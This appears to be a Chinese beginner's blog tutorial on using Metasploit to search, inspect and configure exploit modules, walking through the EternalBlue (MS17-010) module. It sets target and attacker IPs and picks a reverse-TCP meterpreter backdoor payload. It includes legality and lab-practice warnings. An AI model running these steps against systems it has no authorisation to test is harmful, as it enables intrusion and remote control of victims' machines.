新手怎么用MSF查漏洞?看这一篇就够了!MSF入门教程,新手快速掌握漏洞利用技巧
刚接触渗透测试,面对一堆漏洞代码是不是头大?
别慌!今天手把手教你用Metasploit这个"黑科技武器库",像查字典一样轻松看透漏洞老底。咱们不整虚的,直接上实战案例,包你三分钟学会查漏洞、看参数、避大坑!
第一步:翻"漏洞字典"的正确姿势
打开你的MSF控制台,先整明白这几个命令:
-
search
命令是放大镜:输入search ms17-010
,立马跳出永恒之蓝相关模块(别小看这个,去年还有企业栽在这漏洞上) -
use
命令是传送门:看到exploit/windows/smb/ms17_010_eternalblue
这种路径别怂,直接复制粘贴use
后面接路径就能钻进去 -
info
命令是说明书:输入后蹦出来的英文别慌,重点看这几个参数:-
Rank
危险等级:看到excellent
就偷笑吧,成功率超高 -
Targets
适用系统:写着Windows 7 SP1 x64
的千万别拿去怼Win10
-
举个栗子🌰:
msf6 > search ms17-010 # 搜索永恒之蓝模块msf6 > use 0 # 选第一个利用模块msf6 > info # 查看详细信息
第二步:破解"天书"的关键参数
info
命令返回的信息量爆炸?咱们挑重点看:
参数名 | 作用 | 新手常见坑点 |
---|---|---|
RHOSTS | 要攻击的目标IP | 忘设置这个等于拿枪不装子弹 |
RPORT | 服务端口号(445是SMB默认口) | 扫到开3389端口的别往445怼 |
PAYLOAD | 攻击成功后植入的后门类型 | 新手建议用meterpreter 稳如老狗 |
举个血泪教训:
上次有个兄弟把RHOSTS
设成自家路由器IP,结果把自己网搞崩了...记住啊!测试前先拿虚拟机练手,别拿生产环境开涮
第三步: *** 私藏的高级技巧
Q:参数设置完了还是报错咋整?
A:试试这三板斧:
-
show options
复查参数:看哪个Required项还标着红色no
-
set VERBOSE true
开启唠叨模式:让系统把报错细节吐干净 -
check
命令先探路:部分模块支持预检查,避免真刀真枪翻车
Q:模块太多记不住怎么办?
送你个过滤口诀:
-
search type:exploit
只看攻击模块 -
search platform:windows
专筛Windows漏洞 -
search name:ssh
精准定位SSH相关
第四步:永恒之蓝实战查漏洞
咱们用经典漏洞MS17-010走个流程:
- 搜索模块
msf6 > search eternalblue# 看到exploit/windows/smb/ms17_010_eternalblue记下编号
- 查看详情
msf6 > use 0msf6 > info# 重点看Disclosure Date是2017-03-14,超过5年的漏洞要小心防护
- 配置参数
msf6 > set RHOSTS 192.168.1.100 # 目标机IPmsf6 > set LHOST 192.168.1.200 # 你的攻击机IP
- 查看可用载荷
msf6 > show payloads# 选windows/x64/meterpreter/reverse_tcp这种稳定版本
小编观点时间
玩转MSF查漏洞就像学炒菜——火候掌握好了是厨神,乱搞就是炸厨房。建议新手牢记三点:永远先查info看适用范围、测试前虚拟机里试水、用完记得back退回主界面。最近发现不少人在公网瞎扫端口,再次强调:未经授权的渗透测试可是违法行为!咱们学技术是为防御,可不是当脚本小子搞破坏啊~